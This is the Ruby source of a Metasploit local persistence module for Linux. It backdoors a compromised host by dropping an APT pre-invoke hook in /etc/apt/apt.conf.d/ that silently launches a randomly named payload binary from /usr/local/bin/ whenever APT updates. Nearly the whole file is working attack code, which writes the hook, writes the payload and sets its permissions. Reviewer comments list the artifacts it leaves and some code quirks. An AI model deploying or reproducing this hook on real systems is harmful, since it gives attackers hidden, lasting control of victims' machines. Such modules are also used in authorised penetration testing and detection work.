GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/local/apt_package_manager_persistence.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Local persistence module: drops an APT::Update::Pre-Invoke hook under
# /etc/apt/apt.conf.d/ that launches a payload binary written to WritableDir.
#
# Artifacts this module leaves on the host (useful for detection / cleanup):
#   * a hook file in /etc/apt/apt.conf.d/ named HOOKNAME, or two digits followed
#     by 5..8 random letters when HOOKNAME is unset;
#   * a payload file in WritableDir (default /usr/local/bin/) named BACKDOOR_NAME,
#     or 5..10 random alphanumerics, chmod 0755.
# Msf::Exploit::FileDropper is mixed in, but nothing in this class registers the
# written files for cleanup, so both artifacts outlive the session.
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Post::File
  include Msf::Post::Linux::System

  # Registers module metadata and the HOOKNAME / BACKDOOR_NAME options plus the
  # WritableDir advanced option.
  #
  # @param info [Hash] module info merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'APT Package Manager Persistence',
      'Description' => %q(
        This module will run a payload when the package manager is used. No
        handler is ran automatically so you must configure an appropriate
        exploit/multi/handler to connect. This module creates a pre-invoke hook
        for APT in apt.conf.d. The hook name syntax is numeric followed by text.
      ),
      'License' => MSF_LICENSE,
      'Author' => ['Aaron Ringo'],
      'Platform' => ['linux', 'unix'],
      'Arch' =>
        [
          ARCH_CMD,
          ARCH_X86,
          ARCH_X64,
          ARCH_ARMLE,
          ARCH_AARCH64,
          ARCH_PPC,
          ARCH_MIPSLE,
          ARCH_MIPSBE
        ],
      'SessionTypes' => ['shell', 'meterpreter'],
      # No handler is started; the operator is expected to run one separately.
      'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => true },
      'DisclosureDate' => '1999-03-09', # Date APT package manager was included in Debian
      # NOTE(review): this is a flat array; reference entries are conventionally
      # nested, i.e. [['URL', '...']] -- confirm against other modules.
      'References' => ['URL', 'https://unix.stackexchange.com/questions/204414/how-to-run-a-command-before-download-with-apt-get'],
      'Targets' => [['Automatic', {}]],
      'DefaultTarget' => 0
    ))

    register_options(
      [
        OptString.new('HOOKNAME', [false, 'Name of hook file to write']),
        OptString.new('BACKDOOR_NAME', [false, 'Name of binary to write'])
      ])

    register_advanced_options(
      [
        # Default ends with '/'; the exploit appends the file name directly, so a
        # value without a trailing separator would produce a wrong path.
        OptString.new('WritableDir', [true, 'A directory where we can write files', '/usr/local/bin/'])
      ])
  end

  # Writes the APT pre-invoke hook and the payload file, verifying each with
  # exist? and aborting via fail_with on any failure.
  #
  # Preconditions checked: /etc/apt/apt.conf.d/ and WritableDir must be writable
  # from the session.
  # Side effects: creates the hook file and the payload file, chmods the latter
  # to 0755, and mutates the datastore['WritableDir'] string in place (see note
  # below).
  def exploit
    hook_path = '/etc/apt/apt.conf.d/'
    unless writable? hook_path
      fail_with Failure::BadConfig, "#{hook_path} not writable, or APT is not on system"
    end
    # `<<` mutates the string literal above in place. That works because the file
    # has no `# frozen_string_literal: true`; adding that pragma would raise
    # FrozenError here. HOOKNAME is used verbatim, without validation.
    hook_path << (datastore['HOOKNAME'] || "#{rand_text_numeric(2)}#{rand_text_alpha(5..8)}")

    backdoor_path = datastore['WritableDir']
    unless writable? backdoor_path
      fail_with Failure::BadConfig, "#{backdoor_path} is not writable"
    end
    backdoor_name = datastore['BACKDOOR_NAME'] || rand_text_alphanumeric(5..10)
    # NOTE(review): this appends to the datastore's own String object rather than
    # a copy, so the WritableDir option value carries the file name afterwards;
    # no separator is inserted between directory and name.
    backdoor_path << backdoor_name

    print_status('Attempting to write hook:')
    # APT evaluates this config fragment and runs the quoted command before an
    # update; the payload is detached with setsid and its stderr discarded.
    hook_script = "APT::Update::Pre-Invoke {\"setsid #{backdoor_path} 2>/dev/null &\"};"
    write_file(hook_path, hook_script)

    # exist? only confirms a file is present, not that its content matches.
    unless exist? hook_path
      fail_with Failure::Unknown, 'Failed to write Hook'
    end
    print_status("Wrote #{hook_path}")

    # Command payloads are written as-is; every other arch gets a generated ELF.
    if payload.arch.first == 'cmd'
      write_file(backdoor_path, payload.encoded)
    else
      write_file(backdoor_path, generate_payload_exe)
    end

    unless exist? backdoor_path
      fail_with Failure::Unknown, "Failed to write #{backdoor_path}"
    end
    print_status("Backdoor uploaded #{backdoor_path}")
    print_status('Backdoor will run on next APT update')

    # permissions chosen to reflect common perms in /usr/local/bin/
    chmod(backdoor_path, 0755)
  end
end